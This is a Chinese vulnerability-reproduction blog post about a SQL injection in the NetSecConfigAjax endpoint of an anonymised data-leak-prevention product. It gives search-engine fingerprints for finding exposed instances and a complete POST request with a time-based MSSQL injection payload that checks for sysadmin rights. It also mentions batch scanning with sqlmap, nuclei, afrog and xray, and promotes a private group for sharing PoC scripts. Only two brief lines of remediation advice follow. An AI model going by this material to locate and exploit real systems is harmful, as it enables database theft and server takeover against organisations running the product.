当前位置: 首页 > news >正文

【漏洞复现】某赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL注入漏洞

0x01 产品简介

某赛通新一代数据泄露防护系统(简称 DLP),以服务企事业单位进行数据资产梳理、数据安全防护为目标。系统采用平台化管理,将终端DLP、网络DLP、邮件DLP、存储扫描DLP、API 接口DLP 进行统一管理,模块化控制。将对数据进行分类分级扫描,实现终端数据资产梳理、文件服务器数据梳理、数据库数据资产梳理、数据加密防护、数据外发监测、终端运维管理、邮件外发控制、数据水印、端口管控。

0x02 漏洞概述

某赛通数据泄露防护(DLP)系统NetSecConfigAjax接口处存在sql注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 搜索引擎

body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp" || body="/CDGServer3/index.jsp"

在这里插入图片描述

0x04 漏洞复现

POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BFFA734FFFC1D940FA2710CD18F4CA23
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 99command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:10'--

在这里插入图片描述
sqlmap验证
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • docker docker-compose创建容器并运行时发现redis.conf: Is a directory
  • springboot+neo4j的demo
  • 【论文分享】基于非参数方法和无所不在的兴趣点数据的子中心识别——以284个中国
  • tianai-captcha SpringBoot 行为验证码 支持滑动、旋转、文字点选等
  • 线程池概述
  • 在 FastAPI 项目中使用 Python 注解类型实现通用返回结构
  • docker的基本管理和应用
  • Linux磁盘管理与文件系统(二):实用工具和命令、fdisk分区示例
  • 【QGroundControl二次开发】十. QT添加GStreamer视频播放同时保存
  • 【C++ 秘籍】解锁 stack、queue 和 priority_queue 及容器适配器的神奇世界
  • haproxy七层代理
  • C++构造和析构
  • `torch.device(“mps“)`、pip华为镜像源dockerfile以及后缀安装
  • 华为OD笔试
  • C#开启和关闭UAC功能
  • (十五)java多线程之并发集合ArrayBlockingQueue
  • eclipse的离线汉化
  • HTTP 简介
  • Java 多线程编程之:notify 和 wait 用法
  • JavaScript中的对象个人分享
  • Java反射-动态类加载和重新加载
  • mockjs让前端开发独立于后端
  • V4L2视频输入框架概述
  • Wamp集成环境 添加PHP的新版本
  • 关于使用markdown的方法(引自CSDN教程)
  • 开年巨制!千人千面回放技术让你“看到”Flutter用户侧问题
  • 批量截取pdf文件
  • 前端学习笔记之原型——一张图说明`prototype`和`__proto__`的区别
  • 深入体验bash on windows,在windows上搭建原生的linux开发环境,酷!
  • 我从编程教室毕业
  • 系统认识JavaScript正则表达式
  • Nginx惊现漏洞 百万网站面临“拖库”风险
  • 扩展资源服务器解决oauth2 性能瓶颈
  • ​Java并发新构件之Exchanger
  • # SpringBoot 如何让指定的Bean先加载
  • # 睡眠3秒_床上这样睡觉的人,睡眠质量多半不好
  • #前后端分离# 头条发布系统
  • (02)Unity使用在线AI大模型(调用Python)
  • (1)(1.11) SiK Radio v2(一)
  • (1)svelte 教程:hello world
  • (C++17) optional的使用
  • (代码示例)使用setTimeout来延迟加载JS脚本文件
  • (机器学习的矩阵)(向量、矩阵与多元线性回归)
  • (一)python发送HTTP 请求的两种方式(get和post )
  • .NET Standard、.NET Framework 、.NET Core三者的关系与区别?
  • .py文件应该怎样打开?
  • ::什么意思
  • @EnableWebMvc介绍和使用详细demo
  • [AIGC] Kong:一个强大的 API 网关和服务平台
  • [Bugku] web-CTF靶场系列系列详解⑥!!!
  • [BZOJ 4598][Sdoi2016]模式字符串
  • [C#][DevPress]事件委托的使用
  • [C#]winform部署官方yolov10目标检测的onnx模型
  • [IE编程] 了解Urlmon.dll和Wininet.dll
  • [JavaEE系列] Thread类的基本用法